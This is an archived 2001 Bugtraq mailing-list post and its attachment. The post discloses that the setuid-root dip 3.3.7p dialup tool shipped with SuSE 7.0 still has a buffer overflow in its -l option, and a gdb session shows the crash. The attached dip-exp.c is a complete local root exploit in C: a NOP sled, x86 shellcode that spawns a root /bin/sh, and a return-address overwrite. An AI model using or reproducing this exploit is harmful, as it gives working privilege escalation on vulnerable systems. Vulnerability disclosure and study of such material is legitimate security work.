6727597 2001-07-09 20:33 +0200 /54 rader/ sebi hegi <hegenbart@aon.at>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-10 02:25 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17871>
Ärende: dip 3.3.7p-overflow
------------------------------------------------------------
Hi! After doing a check on my SuSE linux 7.0 x86 i found something
interesting:
hegi@faust:~ > ls -la /usr/sbin/dip
-rwsr-xr-- 1 root dialout 62056 Jul 29 2000 /usr/sbin/dip
DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
I considered this as a sort of old version and did some searching and
found something on insecure.org as well as on securityfocus.com.
Description: Standard overflow (in the -l option processing).
Author: Goran Gajic <ggajic@AFRODITA.RCUB.BG.AC.YU> Compromise: root
(local) Vulnerable Systems: Slackware Linux 3.4, presumably any other
system using dip-3.3.7o or earlier suid root. Date: 5 May 1998
Referring to a bugtraq post from may 5. 1998 I did son research:
root@faust:/home/hegi > gdb /usr/sbin/dip GNU gdb 4.18 Copyright 1998
Free Software Foundation, Inc. GDB is free software, covered by the
GNU General Public License, and you are welcome to change it and/or
distribute copies of it under certain conditions. Type "show
copying" to see the conditions. There is absolutely no warranty for
GDB. Type "show warranty" for details. This GDB was configured as
"i386-suse-linux"...(no debugging symbols found)... (gdb) run -k -l
`perl -e 'print "a" x 130 '` Starting program: /usr/sbin/dip -k -l
`perl -e 'print "a" x 130 '` DIP: Dialup IP Protocol Driver version
3.3.7p-uri (25 Dec 96) Written by Fred N. van Kempen, MicroWalt
Corporation.
DIP: cannot open /var/lock/LCK..aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Datei oder Verzeichnis nicht gefunden
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
Looks like this version is still vulnerable although it went public
in 1998 referring to securityfocus.com.
It´s not world executable but still a security risk on SuSE 7.0. And
I´m wondering why at least SuSE still shippes a product with a known
vulnerability. I was told that Slackware 7.1 shippes the same
version as well vulnerable.
The vendor was contacted 3 years ago, still not patched.
( I wouldn´t consider a sprintf so damn hard to patch. )
Have a nice day.
Sebastian Hegenbart
(6727597) /sebi hegi <hegenbart@aon.at>/--(Ombruten)
Bilaga (text/x-c) i text 6727598
6727598 2001-07-09 20:33 +0200 /52 rader/ sebi hegi <hegenbart@aon.at>
Bilagans filnamn: "dip-exp.c"
Importerad: 2001-07-10 02:25 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17872>
Bilaga (text/plain) till text 6727597
Ärende: Bilaga (dip-exp.c) till: dip 3.3.7p-overflow
------------------------------------------------------------
/* Linux x86 dip 3.3.7p exploit by pr10n */
#include <stdio.h>
#define NOP 0x90
/*thanks to hack.co.za*/
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
"\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";
unsigned long get_sp(void){ __asm__("movl %esp, %eax");}
main(int argc, char *argv[]){
char buf[136];
int i;
int offset=0,*ptr;
long ret;
if(argc!=2){
printf("usage: %s offset\n",argv[0]);
exit(0);}
offset=atoi(argv[1]);
ret=(get_sp()-offset);
for(i=1;i<136;i+=4){
*(long *)&buf[i]=ret;}
printf("\nusing: 0x%x\n\n",ret);
for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++)
buf[i]=NOP;
memcpy(buf+i,shellcode,strlen(shellcode));
execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0);
}
(6727598) /sebi hegi <hegenbart@aon.at>/------------